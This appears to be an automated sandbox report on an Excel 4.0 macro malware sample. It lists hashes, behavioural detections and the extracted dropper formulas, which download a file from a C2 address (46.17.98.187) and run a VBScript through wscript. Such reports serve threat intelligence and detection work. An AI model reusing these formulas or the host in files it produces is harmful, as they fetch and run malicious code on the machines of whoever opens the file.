General

  • Target

    a37a71045e710e6255674fc00f76a431

  • Size

    6KB

  • Sample

    231222-qqgbjahbdj

  • MD5

    a37a71045e710e6255674fc00f76a431

  • SHA1

    44aa71532bff6dd3ea0564fe9ba24a48faf7d96a

  • SHA256

    a20c76642fa9dacf5552999b9a4127c18f6b8ed81605555bd90e4df86db18f1f

  • SHA512

    acb25907cb2484d2680d6825cd5c1f10c94c7bfb09837288aeeb10af4e1e01c7c9b9abfd3d34f75c2a9d0ab1f70636dbc4a23420b2265810e0dbd684429a2462

  • SSDEEP

    192:NDS8uSObrA2OmmfRd8UhHFBFYu7b98yIZCHkH+YSV:N7uTM2wn1FY6b98yIZCHkTSV

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      a37a71045e710e6255674fc00f76a431

    • Size

      6KB

    • MD5

      a37a71045e710e6255674fc00f76a431

    • SHA1

      44aa71532bff6dd3ea0564fe9ba24a48faf7d96a

    • SHA256

      a20c76642fa9dacf5552999b9a4127c18f6b8ed81605555bd90e4df86db18f1f

    • SHA512

      acb25907cb2484d2680d6825cd5c1f10c94c7bfb09837288aeeb10af4e1e01c7c9b9abfd3d34f75c2a9d0ab1f70636dbc4a23420b2265810e0dbd684429a2462

    • SSDEEP

      192:NDS8uSObrA2OmmfRd8UhHFBFYu7b98yIZCHkH+YSV:N7uTM2wn1FY6b98yIZCHkTSV

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks